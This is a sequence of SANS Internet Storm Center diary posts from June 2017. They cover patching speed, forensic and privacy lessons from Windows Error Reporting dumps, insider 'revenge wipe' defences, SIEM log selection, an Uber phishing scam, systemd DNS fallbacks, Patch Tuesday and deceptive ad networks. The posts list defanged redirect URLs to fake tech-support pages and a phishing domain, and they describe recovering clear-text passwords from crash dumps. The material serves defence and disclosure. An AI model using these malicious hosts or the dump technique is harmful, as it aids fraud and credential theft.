Maybe start with how fast or slow should you patch?  Various standards suggest that you must be able to patch critical and high risk issues within 48 hours. Not impossible if you approach it the right way, but you do need to have the right things in place to make this happen.  
You will need: 

  • Asset information - you need to know what you have, how critical it is and of course what is installed on it.  Look at each system you have, evaluate the confidentiality, integrity and availability requirements of the system and categorise the systems into critical and less critical systems to the organisation. 
  • Vulnerability/Patch information - you need information from vendors, open source and commercial alike. Subscribe to the various lists, get a local RSS feed, etc. Vendors are generally quite keen to let you known once they have a patch. 
  • Assessment method – The information received needs to be evaluated.  Review the issue.  Are the systems you have vulnerable? Are those systems that are vulnerable flagged as important to the business? If the answer is yes to both questions (you may have more), then they go on the “must patch” now list.  The assessment method should contain a step to document your decision. This will keep auditors happy, but also allows you to better manage risk.  
  • Testing Regime – Speed in patching processes comes from the ability to test the required functionality quickly and the reliability of those tests. Having standard tests or even better automated tests can speed up the validation process allowing patching to continue.  

Once you have the four core ingredients you are now in a position to know what vulnerabilities are present and hopefully patchable. You know the systems that are most affected by them and have the highest level of risk to the organisation. 

The actual mechanics of patching is individual to each organisation. Most of us however will be using something like WSUS, SCCM or Third-party patching products and/or their linux equivalents like satellite, puppet, chef, etc. In the tool used, define the various categories of systems you have, reflecting their criticality. Ideally have a test group for each, Dev or UAT environments if you have them can be great for this. I also often create a “The Rest” group.  This category contains servers that have a low criticality and can be rebooted without much notice.  For desktops, I often create a test group, a pilot group and a group for all remaining desktops.   The pilot group has representative of most if not all types of desktops/notebooks used in the organisation. 

When patches are released they are evaluated and if they are to be pushed they are released to the test groups as soon as possible. Basic functionality and security testing is completed to make sure that patches are not causing issues. Depending on the organisation we often push DEV environments first, then UAT after a cycle of testing.  Within a few hours of being released you should have some level of confidence that the patches are not going to cause issues. Your timezone may even help you here.  In AU for example patches are often released during the middle of our night. Which means in other countries they may already have encountered issues and reported them (keep an eye the ISC site) before we start patching. 
The next step is to release the patch to ”The Rest” group and for desktops to the pilot group.  Again, testing is conducted to get confidence the patch is not causing issues. Remember these are low criticality servers and desktops. Once happy start scheduling the production releases. Post reboot run the various tests to restore confidence in the system and you are done.  

The biggest challenge in the process is getting a maintenance window to reboot. The best defence against having your window denied is to schedule them in advance and get the various business areas to agree to them.  Patch releases are pretty regular so they can be scheduled ahead of time. I like working one or even two years in advance.  

The second challenge is the testing of systems post patching. This will take the most prep work. Some organisations will need to get people to test systems. Some may be able to automate tests.  If you need people, organise test teams and schedule their availability ahead of time to help streamline your process. Anything that can be done to get confidence in the patched system faster will help meet the 48 hour deadline. 

If going fast is too daunting, make the improvements in baby steps.  If you generally patch every 3 months. Implement your own ideas, or some of the above and see if you can reduce it to two months.  Once that is achieved try and reduce it further.  

If you have your own thoughts on how people can improve their processes, or you have failed (we can all learn from failures) then please share.  The next time there is something similar to wannacry we all want to be able to say “sorted that ages ago”. 

Mark H - Shearwater
 

3 Comments

Published: 2017-06-20

Windows Error Reporting: DFIR Benefits and Privacy Concerns

This post is a guest diary by Renato Marinho. If you have any technical posts like this you would like to share with our community; please let us know.

  1. Introduction

Recently, I was confronted with a scenario where a very suspicious Windows pop-up message was shown to a specific user on a corporate network. It was a kind of “Yes/No” default Windows Dialog Box that, although I cannot reveal the message content, I can assure you that it was in the context of what the user was doing on his computer at that moment.

As we were dealing with a major incident on the same network, our first assumption was that someone had compromised that machine and was controlling it remotely through a reverse connection - the type of situation that urges for a rapid response.

However, after a few hours hunting for any piece of malware on that machine, including operating system events, network connections, user Internet history, e-mail attachments, external devices and so on, nothing interesting was found. In fact, the evidence came from a source I’ve never imagined could help me on an incident response. It came from Windows Error Reporting (WER), as described in this diary.

  1. The subtle clue

As no malware evidence was found, we decide to get back to the drawing board, and after looking carefully at the strange message, I noticed that, whatever application had been used by the “attacker” to present the message, it has hanging. The classic “(Not Responding)” string was shown in the dialog window title, as seen in Figure 1.

Figure 1 – “Not Responding” application sample

By default, when an application hangs or crashes on a Windows system, the Windows Error Reporting (WER) mechanism [1] automatically gathers detailed debug information including the application name, loaded modules and, more important, a heap dump, which comprehends the data that was loaded in the application at the time that the memory was collected. All this data is reported to Microsoft that, in turn, may provide users with solutions for known problems.

As the application used to send the strange message has hanged, the chances are that we could find generated WER artifacts do analyze and track the supposed intrusion. Thus, our next step was looking for them.

  1. Collecting WER information

To demonstrate how we found and analyzed WER files related to that hanged application without exposing real incident information, we’ve created a similar scenario and used it for this analysis.

  1. Crashing an application

Using a Windows 10 default installation machine in our lab, the first thing was forcing an application to crash. For this purpose, we used the text editor application Notepad++ as the application to be crashed and Process Explorer tool [2] as the means to cause it.

For further analyses purposes, we typed a simple text on the editor, as seen in Figure 2 and, through the Process Explorer, started killing aleatory ‘ntdll.dll’ threads, as shown in Figure 3.

Figure 2 – Application to be crashed

Figure 3 – Killing application threads

It didn’t take long for the application get unstable and crash. Exactly at 4:00:11 PM the application stopped working, and Windows started collecting information about the problem, as seen in Figure 4. That was WER into action.

Figure 4 – WER collecting information about crashed application

  1. Looking for evidence

The WER process execution leaves its tracks on the system. One of them is an error log entry detailing the application crash, as shown in Figure 5.

Figure 5 – Application event log evidence

Note that the event ID for crashed application has the value 1000 while for hangeing applications, the value is 1002.

The other evidence are the WER files themselves which, depending on the Windows version are generated in different paths and can be found through different control panel menu options. On Windows 7, for example, WER settings and reporting access can be found through Action Center and on Windows 8 through Problem Reports and Solutions.

On Windows 10, used in our demonstration scenario, the WER menu can be opened through the menu Control Panel -> System and Security -> Security and Maintenance -> Reliability Monitor. In Figure 6 you can see an example of this menu from which a specific error can be selected for further details.

Figure 6 – Looking for the specific problem report

    So, opening the details for our crash event, as shown in Figure 7, we can have access to the files generated by WER. IMPORTANT: depending on WER configuration you have chosen, those files are going to be sent to Microsoft and, after that, deleted from the disk. This is the default behavior that may be changed thorough Windows Registry [3] modifications.

Figure 7 – WER problem details

Another way to find WER files is going directly path they are created on the disk. On Windows 10, WER report files can be reached through the path: “%SystemDrive%\ProgramData\Microsort\Windows\WER”. In Figures 8 and 9, you can see the files generated for our demonstration scenario.

Figure 8 – WER file path

Figure 9 – WER file list

  1. Analyzing the evidence

Now, making a parallel to the real incident case, when we searched for event log evidence, we could find that an application hanged on that machine moments before the message screenshot time. Better than that, we also could find the WER files associated to that application hang!

You may be thinking right now how I could find WER files in the machine as they are deleted from disk after being sent to Microsoft. The point is: they weren’t sent. Those are my hypothesis for that:

  1. The machine was disconnected from the network moments after the strange message appeared, avoiding Windows to send the report to Microsoft;

  2. The WER report wasn’t sent to Microsoft due to the SSL inspection employed on that network Internet access.

Although the hypothesis 1 may be plausible, according to the experiments we have done trying to validate the hypothesis 2 using SSL inspection (in other words, a man-in-the-middle attack), our Windows instance avoided to send WER reports and returned an error message, as seen in Figure 10.

Figure 10 – Problem uploading WER during the MITM attack

    Heading back to the real scenario, with WER files in our hands, we could discover the name of the possible application that generated that suspicious pop-up message and, by inspecting the heap dump file we could confirm it. It turns out that we found exactly the pop-up message content into the memory dump file using a simple “strings” command – although there exist an orthodox way to inspect and debug those files using “Windbg” [4].

    Employing the same “strings” method to look for the text I typed into the Notepad++ before we crash it, we have the result shown in Figure 11.

Figure 11 – Evidence found

  1. Final words

As we could see, in addition to helping Windows users to deal with application crashes and hangs, this case demonstrated that WER can be extremely useful for post-mortem analysis. Depending on the scenario, it’s like having an application memory dump to analyze as part of your DFIR activities without having collected it during the incident.

On the other hand, it raises some concerns regarding data leaking through the memory dump files. Considering that you have consented to send those information to Microsoft (remembering or not that you have done that [5]), there exists the possibility of those content to be accessed by third parts, like intruders that escalated the privileges on the targeted machine or simple by that new employee that is now using your machine and you thought that removing your user home directory could be enough.

Things may get worse if we consider that the crashed or hanged application is a password manager, for example. We did experiments on a group of them and privately reported those that allowed us to recover clear text passwords from WER memory dumps. The Enpass password manager has already published a security bulletin and a new version fixing the vulnerability [6] for which the CVE 2017-9733 [7] has been associated.

For Windows application developers in general, to prevent sensitive information exfiltration from crash dumps, we recommend either completely disabling WER triggering by using AddERExcludedApplication or WerAddExcludedApplication functions [8] or by excluding the memory region that may contain sensitive information using the function WerRegisterExcludedMemoryBlock [9] (available only on Windows 10 and later).

A more comprehensive solution should be provided by Windows itself that could protect report files by encrypting them - at least the memory dumps. Interestingly, there is a patent from IBM exactly about protecting application core dump files [10]. Today, the encryption is employed only while sending WER report files to Microsoft through SSL connections.

Regarding our case, in the end, fortunately realized that there was no violation or intrusion on that machine. It was, indeed, a misuse of a legitimate tool by an internal employee that made us learn a bit more the importance of WER files to digital forensics and user’s privacy.

  1. References

[1] https://msdn.microsoft.com/en-us/library/windows/desktop/bb513613(v=vs.85).aspx

[2] https://technet.microsoft.com/en-us/sysinternals/processexplorer.aspx

[3] https://msdn.microsoft.com/pt-br/library/windows/desktop/bb513638(v=vs.85).aspx

[4] https://blogs.msdn.microsoft.com/johan/2007/11/13/getting-started-with-windbg-part-i/

[5] https://privacy.microsoft.com/en-US/windows-10-feedback-diagnostics-and-privacy

[6] https://www.enpass.io/blog/an-update-on-the-reported-vulnerability-regarding-wer-in-enpass-for-windows-pc/

[7] https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9733

[8] https://msdn.microsoft.com/en-us/library/windows/desktop/bb513635(v=vs.85).aspx

[9] https://msdn.microsoft.com/en-us/library/windows/desktop/mt492587(v=vs.85).aspx

[10] https://www.google.com/patents/US20090172409?lipi=urn%3Ali%3Apage%3Ad_flagship3_messaging%3BELSwd1O0TB2NSjH9aPn1BA%3D%3D

 

Renato Marinho

Morphus Labs | linkedin.com/in/renatomarinho | @renato_marinho

0 Comments

Published: 2017-06-19

As Your Admin Walks Out the Door ..

One of our readers (thanks Gebhard) mailed us a link to an article on what the press is apparently now calling a "Revenge Wipe" - a system administrator who has left the organization, and as a "last hurrah", deletes or locks out various system or infrastructure components.

In this case, the organization was a hosting company in the Netherlands (Verelox).  In the case of cloud providers, a disgruntled admin may have access to delete entire networks, hosts, and associated infrastructure.  In the case where it's a smaller CSP, the administrator may also have access to delete customer servers and infrastructure as well.  In Verelox's situation, that seems to have been the case (from their press release at least)

The classic example of this is the City of San Francisco in 2008), where their main administrator (Terry Childs) refused to give up the credentials to their "FiberWAN" Network Infrastructure, even after being detained by law enforcement (he eventually did give the credentials directly to the Mayor).  I've listed several other examples in the references below - note that this was not a new thing even in 2008 - this has been a serious consideration for as long as we've had computers.

So, how should an organization protect themselves from a situation like this?

Back up Job Responsibilities:

Know who has access to what.  Have multiple people with access to each system.  Having any system  with only a single administrator can turn into a real problem in the future.  DOCUMENT things.  BACKUP your configurations in addition to your data.

Use Authorization:

It can be difficult, but wherever possible use Admin accounts with only the rights required.  It’s very easy to build an “every Admin has all  rights” infrastructure.  It’s likely more difficult to build a “why does the VMware admin need the rights to delete an entire LUN on the San” config – but it’s important to think along those lines wherever you can.

Use a back-end directory for authentication to network infrastructure:

What this often means is that folks implement NPS (RADIUS) services in Active Directory.  This allows you to audit access and changes during regular production, and also allows you to deactivate network administrator accounts in one place

Where you can, use Two Factor Authentication

Use 2FA whereever possible, this makes password attacks much less of a threat.  2FA is a definite "easy implement" for VPN and other remote access, also for administration of almost all Cloud Services for your organization.

Just as a side note - I am still seeing that many smaller CSPs have not gone forward with 2FA - if you are looking at any new Cloud services, adding Two Factor Authentication as a "must-have" is a good way to go.

Deal with "Stale" Accounts:

Keep track of accounts that are not in use.  I posted a powershell script for this (targeting AD) in a previous story ==> https://isc.sans.edu/diary/The+Powershell+Diaries+-+Finding+Problem+User+Accounts+in+AD/19833

Deal with "Service Accounts":

Service accounts are used in Windows and other operating system to run things like Windows Services, or to allow scripts to login to various systems as they run.  The common situation is that these service accounts have Domain Administrator or local Root access (depending on the OS).

Know in your heart that the person you are protecting the organization from is the same person who likely created one or all of these accounts. 

Be sure that these service accounts are documented as they are created, so that if a mass change is required it can be done quickly.

Know that these use a central directory (such as AD or LDAP), so that if you need to change them or disable them, there is one place to go.

I posted a PowerShell script in a previous story to inventory service accounts in AD ==> https://isc.sans.edu/forums/diary/Windows+Service+Accounts+Why+Theyre+Evil+and+Why+Pentesters+Love+them/20029/

Restrict Remote Access:

Be sure that your administrative accounts don't have remote access (VPN, RDP Gateway, Citrix CAG etc).  This falls into the same category as "don't allow Administrators to check mail or browse the internet while logged in as a Domain Admin or root privileges.

On the day:

On the day of termination, be sure that all user accounts available to our administrator are deactivated during the HR interview.  If you've used a central authentication store this should be easy (or at least easier)

Also force a global password change for all users (your departing admin has probably done password resets for many of your users), and if you have any stale accounts simply deactivate those.

For Service accounts, update the passwords for all of these.  This is a good time to be sure that you aren't following a pattern for these passwrods - use long random strings for these (L33t speak versions of your company or product name are not good choices here).

I'm sure that I've missed some important things - please, use our comment for to fill out the picture.  This is a difficult topic, since many of us are admins for one thing or another this really hits close to home.  But for the same reason, it's important that we deal with it correctly, or as correctly as the situation allows.

References:

https://www.heise.de/newsticker/meldung/Revenge-Wipe-Ex-Admin-loescht-Daten-bei-niederlaendischem-Provider-3740243.html?view=print

https://translate.google.com/translate?sl=auto&tl=en&u=https%3A//www.heise.de/newsticker/meldung/Revenge-Wipe-Ex-Admin-loescht-Daten-bei-niederlaendischem-Provider-3740243.html%3Fview%3Dprint

https://www.schneier.com/blog/archives/2008/07/disgruntled_emp.html

http://www.infoworld.com/article/2653004/misadventures/why-san-francisco-s-network-admin-went-rogue.html

https://www.scmagazine.com/former-system-admin-sentenced-to-34-mo-for-hacking-former-employer/article/640254/

https://www.wired.com/2016/06/admin-faces-felony-deleting-files-flawed-hacking-law/

http://www.independent.co.uk/news/business/news/disgruntled-worker-tried-to-cripple-ubs-in-protest-over-32000-bonus-481515.html

 

===============
Rob VandenBrink
Compugen

4 Comments

Published: 2017-06-17

Mapping Use Cases to Logs. Which Logs are the Most Important to Collect?

When it comes to log collection, it is always difficult to figure out what to to capture. The primary reasons are cost and value. Of course you can capture every logs flowing in your network but if you don't have a use case to attach to its value, that equals to wasted storage and money. Really not ideal since most Security Information Management (SIM) also referred to Security Information and Event Management (SIEM) have a daily cost associate with log capture. Before purchasing a SIM, the first task that is often difficult is, what do I collect and why? We want quality over quantity. Again, what you collect has a cost, the minimum amount of time logs are retained (how many years) must be calculated because it directly related to the number of events per second (EPS) collected daily [1], how many log collector are necessary to capture what you need, etc.

Next, it is important to identify your top five use cases, based on value that can have an immediate impact with the security team. This part is often difficult to pin point because it usually isn't an exercise the stakeholders have already worked out, in the end, it must map to the use case, what do I need to capture to be successfully alerted on? When the use cases have been identified, it is time to figure out what logs are necessary to identify the threat as it happen. You may have already identified some threats based on previous incidents which can be translated into a use case.

If you are looking for some examples, Anton Chuvakin [2][3] has written extensively on SIEM and is a good place to start. The next thing to do after you have identified your five use case, determine the quality of your logs into a spreadsheet into five category; identify the log source (firewall, IPS, VPN, etc.), its category (user activity, email, proxy, etc.) , its priority (high, medium, low), information type (IP, hostname, username, etc.) and matching use case (authentication, suspicious outbound activity, web application attack, etc.)[4]. The last step is to identify the SIM that will meet your goals.

[1] http://www.buzzcircuit.com/tag/siem-storage-calculator/
[2] http://blogs.gartner.com/anton-chuvakin/2014/05/14/popular-siem-starter-use-cases/
[3] http://blogs.gartner.com/anton-chuvakin/2013/09/24/detailed-siem-use-case-example/
[4] http://journeyintoir.blogspot.ca/2014/09/siem-use-case-implementation-mind-map.html
[5] https://isc.sans.edu/forums/diary/SIEM+is+not+a+product+its+a+process/20399

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

1 Comments

Published: 2017-06-16

What is going on with Port 83?

When I'm on shift, I really like to look at the port trends and see what the changes are.  Looking at shifts in the network traffic is a great way to provide early warning that something new is out there.  So today, port 83 caught my eye because it's just not a common port you run into.  The climb in traffic has been subtle, but there were a couple of steep upticks along the way with the latest being in the last 24 hours.


 

 

 

 

 

 

 

 

 

 

First step, what normally lives as a service on this port?  Well, IANA has the following:

However, I can't find any documentation about this.  This step can sometimes be one of the most frustrating.  It's not the research part, but finding GOOD documentation that lays out the service or protocol that normally listens on a port.  Its finding sample traffic, logs etc. that can help you understand what you are seeing. That, however, is a completely different topic, but might be a fun rabbit hole to go down later.

Now, the fun part...getting packets to see what we can figure out what is going here.  Normally that helps, but today, not so much.  It actually has made it a little more confusing only because there are a lot of disparate items  (so it seems) in the traffic and some very curious. Johannes got a sample of traffic off our honeypot by setting up a netcat listener.  Here are a few of the interesting tidbits from the packets, but I haven't figured out how to put it all together or if any of it even fits together.

  • There was a successful three-way handshake, then one packet with the PSH and ACK flags set and that was followed by a graceful teardown.  Here is what data was pushed:

  • Now for some interesting UDP traffic (HTTP/UDP):

  • Here is another one over UDP which looks like a regular UPNP search:

  • UDP with just one recognizable word:

  • These two UDP packets seem related to TeamSpeak:

 

Who knew there was so much action on a port that I really hadn't looked at till today.  If you have any packet captures for this or any ideas how this fits together or if it's just random, please let us know!!

1 Comments

Published: 2017-06-15

Uberscammers

E-mail scams, phishing and social engineering is something that we (security people) became really used to. Even from the penetration testing engagements I do, when we utilize social engineering, it’s almost always extremely successful showing that, unfortunately, people still do not pay enough attention to validity of e-mails they received.

That being said, sometimes we do encounter really good (or bad for us defenders :/) phishing attempts. Couple of weeks ago, one of our readers, Matthew Henry sent in an example of a scam against Uber users (and we know that those count in millions).

The e-mail appeared as a typical Uber receipt where it looked as the recipient was charged for a ride in France. The e-mail is shown below:

The bait was at the bottom, and you can see it here:

Of course, none of the users that receive this e-mail would have taken this trip so the phisher in this case is trying to get people to click on the link to dispute the received receipt.

See the domain? uberdisputes.com is not an Uber’s domain. At the time of the phishing e-mail circulating around, the domain was only a day old. If you visited the link shown above while it was still up, you would be asked to log in:

After logging in, in order to dispute the receipt, the site would ask for the credit card number, of course, so the victim can be reimbursed. You can probably guess what happened with the credit card after submission …

While all this is nothing particularly amazing, what I do find unbelievable is how easy it is for the bad guys to get certificates for such web sites. Although there has been a lot of discussion about how Let’s Encrypt can be used now for all sorts of certificates, in this example we can see that another CA, this time COMODO, happily issued a certificate for domain uberdisputes.com:

(Small rage: I wonder who was the GENIUS in Google that decided to remove SSL/TLS certificate information from the lock icon in Google Chrome. Yeah, it was a great idea to make users open Developer Tools to see it grrrr). 

Such cases are very common and always make me wonder why both CA’s and big companies do not do the following:

  • For CA’s, they should have a list of critical keywords of big players that are commonly used in attacks. For example, I would not let automatic systems issue a certificate for a domain such as microsoft-software.com (it belongs to Microsoft luckily),
  • For big(ger) companies, I would try to register/buy most domains that are similar to the company’s name, and especially those that can be potentially used for phishing.

--
Bojan
@bojanz
INFIGO IS

5 Comments

Published: 2017-06-14

Systemd Could Fallback to Google DNS?

Google is everywhere and provides free services to everyone. Amongst the huge list of services publicly available, there are the Google DNS, well known as 8.8.8.8, 8.8.4.4 (IPv4) and 2001:4860:4860::8888, 2001:4860:4860::8844 (IPv6). But Google is far from being a non-profit organisation and they collect a lot about you via their DNS[1]. Nothing is free and, when you get something for “free”, you (your data) are the valuable stuff. Never forget this!

It is already known that many systems are using the Google DNS as a fallback configuration. Docker is a good example. As written in the documentation[2]:

After this filtering, if there are no more nameserver entries left in the container's /etc/resolv.conf file, the daemon adds public Google DNS nameservers (8.8.8.8 and 8.8.4.4) to the container’s DNS configuration. If IPv6 is enabled on the daemon, the public IPv6 Google DNS nameservers will also be added (2001:4860:4860::8888 and 2001:4860:4860::8844)

Yesterday, there was some interesting tweets passing around about the same kind of behaviour but for systemd[3]. 

"systemd" is the new system introduced in 2012 to replace the good old “init”. It is used to manage processes started at boot time (in userland space). systemd introduced a lot of new features but also was the reason of major flamewars in the Linux community about pros and cons of the new system.

In the GitHub repository of systemd, in the configure.ac file, we can read the following block of code[4]:

AC_ARG_WITH(dns-servers,
        AS_HELP_STRING([--with-dns-servers=DNSSERVERS],
                [space-separated list of default DNS servers]),
        [DNS_SERVERS="$withval"],
        [DNS_SERVERS="8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844"])

How to interpret this code? systemd has a built-in fallback mechanism that specifies, at compilation time, that if no resolvers are configured, it uses the Google DNS by default! I performed a quick check on different Linux distributions (installed out-of-the-box):

Distribution Comments
ArchLinux Found the commented line in /etc/systemd/resvolved.conf:
#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
CentOS Nothing found
CoreOS Nothing found
Debian Nothing found
Fedora Found the commented line in /etc/systemd/resvolved.conf:
#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
Gentoo Nothing found
OpenSuse Nothing found
RedHat ES Not tested
Suse ES Not tested
Ubuntu Nothing found

Some distributions, like Slackware, never implemented systemd.

This ‘FallbackDNS’ purpose is defined here[5]

A space-separated list of IPv4 and IPv6 addresses to use as the fallback DNS servers. Any per-link DNS servers obtained from systemd-networkd.service(8)  take precedence over this setting, as do any servers set via DNS= above or /etc/resolv.conf. This setting is hence only used if no other DNS server information is known. If this option is not given, a compiled-in list of DNS servers is used instead.

I also found an old report about this in the Debian bug tracker[6].

But the DNS configuration is not the only one to be affected, a list of default NTP servers is also preconfigured at compilation time[7]:

AC_ARG_WITH(ntp-servers,
        AS_HELP_STRING([--with-ntp-servers=NTPSERVERS],
                [space-separated list of default NTP servers]),
        [NTP_SERVERS="$withval"],
        [NTP_SERVERS="time1.google.com time2.google.com time3.google.com time4.google.com"])

Ok, nothing really critical here. Based on the tested distributions, there is almost no risk to see systemd falling back to the Google DNS. However, this is a good signal to keep in mind that some developers might introduce dangerous features and/or configurations in their code. Grepping for static IP addresses in configuration files is always a good reflex. About the DNS, my recommendation is to restrict the DNS traffic on your network and run your own resolver. 

[1] https://developers.google.com/speed/public-dns/privacy
[2] https://docs.docker.com/engine/userguide/networking/default_network/configure-dns/
[3] https://en.wikipedia.org/wiki/Systemd
[4] https://github.com/systemd/systemd/blob/a083537e5d11bce68639c492eda33a7fe997d142/configure.ac#L1305
[5] https://www.freedesktop.org/software/systemd/man/resolved.conf.html#FallbackDNS=
[6] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=761658
[7] https://github.com/systemd/systemd/blob/master/configure.ac#L1218

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2017-06-13

Microsoft and Adobe June 2017 Patch Tuesday: Two Exploited Vulnerabilities Patched

Today, Microsoft and Adobe released their usual monthly security updates. Microsoft patched a total of 96 different vulnerabilities. Three vulnerabilities have already been disclosed publicly, and two vulnerabilities stick out for being already exploited according to Microsoft:

%%cve:2017-8464%%

This vulnerability can be exploited when a user views a malicious shortcut file. Windows shortcuts use small files that describe the shortcut. The file will tell Windows what icon to display to represent the file. By including a malicious icon reference, the attacker can execute arbitrary code. This problem is probably easiest exploited by setting up a malicious file share, and tricking the user into opening the file share via a link. Similar vulnerabilities have been exploited in Windows in the past. Exploits should surface shortly in public. Microsoft's description of the vulnerability is a bit contradicting itself. In the past, if a vulnerability had already been exploited in the wild, Microsoft labeled them with an exploitability of "0". In this case, Microsoft uses "1", which indicates that exploitation is likely. But on the other hand, the vulnerability is already being exploited.

%%cve:2017-8543%%

ETERNALBLUE Reloaded? This vulnerability is another one that is already exploited according to Microsoft. The vulnerability is triggered by sending a malicious "Search" message via SMB. The bulletin does not state if exploitation requires authentications. The attacker will have full administrative access to the system, so this vulnerability can also be exploited for privilege escalation.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
STI|Twitter|

8 Comments

Published: 2017-06-12

An Introduction to VolUtility

If you would like to practice memory forensics using Volatility but you don't like command line tools and you hate to remmber plugins then VolUtility is your friend.

Volutility1 2 is a web frontend for Volatility framework.

 

Installation

In this dairy, I will install VolUtlity on Linux SIFT3 workstation.

 
  1. Update your SIFT workstation and install django with the following commands:

$ sudo apt-get update && sudo apt-get upgrade

$ sudo pip install pymongo django

 

 

  1. Install MongoDB :

In this dairy I am not going to discuss how to install MongoDB , for futher details about how to install MongoDB please refer to:

https://docs.mongodb.com/v3.2/tutorial/install-mongodb-on-ubuntu/

  1. Install Volatility

$ git clone https://github.com/volatilityfoundation/volatility

$ cd volatility

$ sudo python setup.py install

 

  1. Get VolUtility

$ git clone https://github.com/kevthehermit/VolUtility

 

Configuration

In this diary I am going to use the default config file “volutility.conf.sample”

Running

cd in to the VolUtility folder and run the following command , in this diary I will use port 8000 as a listening port

$ ./manage.py runserver 0.0.0.0:8000

 

Usage

VolUtility operates on the principal of sessions. Each memory image has its own session that is used to track all the plugin results and associated data.

To create a new session, navigate to the home page and click the New + Button

Enter a name for the session and the location of the memory image ,for the profile you can either specify it or you can choose autodetect, then click on submit button  :

You have to wait for few minutest till it finishes from processing the image, once it finished the status will change to “Complete”

To examine the image click on the session name , in this the dairy it’s “SANS ISC” . Once you click on the session it will take you to a new page.

On the upper left corner there will be some information about the session:

Now let’s try some of the plugins :

To run a plug in you type the plugin name in the Filter Plugins text box and you can run it by clicking on the Play button .

And here is some sample outputs

pslist

netscan

cmdline

One advantage of using VolUtility over using the command line is the possibility of exporting results to csv file, to do so click on down arrow next to the result

And you can of course filter your result using tools such as MS Excel.

_______________________________________________________

[1] https://github.com/kevthehermit/VolUtility/wiki

[2] http://holisticinfosec.blogspot.com/2016/04/toolsmith-115-volatility-acuity-with.html

[3] https://digital-forensics.sans.org/community/downloads

 

 

0 Comments

Published: 2017-06-10

An Occasional Look in the Rear View Mirror

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness when driving. What if this principle were applied to the area of hardware and software inventory? Perhaps in the form of a quarterly reminder to consider CIS Critical Security Controls 1 and 2 that called for an objective look at hardware and software that might not be as shiny and new. Intentionally searching for this type of deferred maintenance could very well find unnecessary risk that is imposed on the entire organization.

 

Some organizations have an interesting approach - for every new tool purchased, two tools must also be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while - particularly at the area of technology retirement to make sure you don't just continue to increase the collection of tools. Who knows what might be discovered.

 

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

 

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

2 Comments

Published: 2017-06-08

Summer STEM for Kids

It's summertime and your little hackers need something to keep them busy! Let look at some of the options for kids to try out. I’ve tried out each of these programs and have had good luck with them. Please post in comments any site you have been successful with your kids in teaching them STEM or IT Security. I’ll keep this list up on my github https://github.com/tcw3bb/ISC_Posts/blob/master/Kids_Coding_Security_Resource. 

 

Coding Options (4-7)

Scratch jr (app) http://pbskids.org/learn/scratchjr/

  • Is a gui application that easy to use building blocks to make programs. You will need to help your kids as there is no walk through within the app.

Coji (Robot and App) http://wowwee.com/coji

  • Coji is a robot where you use an app to move him around your house. The app also has games to teach you coding basics. A about half of the puzzle are too hard for him, but it's fun.  

Coding Options (7 and 12)

Scratch (PC) https://scratch.mit.edu/

  • Scratch is a application that allows you to code using building block. This version has more complex logic options.

Hour  of code(PC). https://code.org/learn

  • Learn coding basics using a browser in about an hour per section. Lots of different themes to keep kids interested.

Made with code(PC) http://Madewithcode.com

  • Similar to hour of code but more slanted towards girls. Great for all thought.

Minecraft modding (PC)  http://learntomod.com

  • They use building blocks like scratch to make Minecraft Mods. They have lots of options to play and learn watching videos for each learning objective and earn badges. 

 

Scratch Books

Coding Games in Scratch (Jon Woodcock)

20 Games to Create with Scratch (Max Wainewright)

Scratch Coding Cards (Natalie Rusk)

  • These cards can be done on at a time, to do coding in little bites.

 

Electronics

Snap Circuits  http://www.snapcircuits.net/

  • These are the replacement for the ScienceFair 150-in-1 projects I grew up with. Build simple electronics by snapping together electronic parts.

Makeblock http://www.makeblock.com/

  • Arduino kit that plugs into scratch . There a lots of cools project depending on what kits you have. I bought several when radio shack was closing in my area.

--

Tom Webb

@twsecblog

0 Comments

Published: 2017-06-07

Deceptive Advertisements: What they do and where they come from

About a week ago, a reader asked for help with a nasty typo squatting incident:

The site, “yotube.com”, at the time redirected to fake tech support sites. These sites typically pop up a message alerting the user of a made-up problem and offer a phone number for tech support.

Investigating the site, I found ads, all of which can be characterized as deceptive. In addition to offering tech support, some of the ads offered video players for download or even suggested that the user has to log in to the site, offering a made up login form. If a user clicks on these ads, the user is sent to a number of different redirects. For example:

For example: (URL parameters removed to make this more readable)

hxxp://inclk.com/adServe/feedclick (URL the ad linked to)
hxxp://p185689.inclk.com/adServe/adClick
hxxp://wkee.reddhon.com/d7477cb3-70f0-4861-a578-a5b6ef73a167
hxxp://www.rainbow-networks.com/RBN3seB
hxxp://critical-system-failure8466.97pn76810224.error-notification-3.club/ (fake tech support page)

hxxp://inclk.com/adServe/banners
hxxp://inclk.com/adServe/banners/findBanner
hxxp://service.skybrock.com/serving/
hxxp://cdn.glisteningapples.pro/lp/

At the time, the ads were hosted at “inclk.com.” Inclk.com is a URL used by RevenueHits, an ad network.

Knowing where these ads come from, I set up an account with RevenueHits and added ads to a test page. So far, I have only gotten deceptive ads like the following:

The ads usually claim that a video player is used to view the page, or they suggest that software like a Flash player is out of date and needs to be updated. In one case, it even suggested that I need to log in to view the site and redirected me to a login page, which could be considered phishing.

Next, you are offered a download:

Below this dialog, a hard to read disclaimer is displayed (I left the colors "as is." Click on the image for a full-resolution version):

Virustotal identifies the resulting download as "Adware." I didn't install it, but from experience, the installer will install a valid Flash Player in addition to a bunch of adware, often in the form of browser toolbars.

Now, these ads were after all displayed on my page, and I had an account set up with RevenueHits. So I decided to inquire about the deceptive ads I received:

I just started testing revenue hits, and all the ads I receive are downloads of fraudulent media players. Is there a way to filter these ads? Do you have a way to flag ads as inappropriate? thx.

The moment I submitted this request, I received the following (obviously automated) response:

JohannesUllrich 

Your account was automatically banned by our system, due to fraudulent traffic sources.

Please notice that once our system mark your traffic as fraud, there is nothing I can do to change it 

Please check again all you traffic sources.

Regards 

Support team

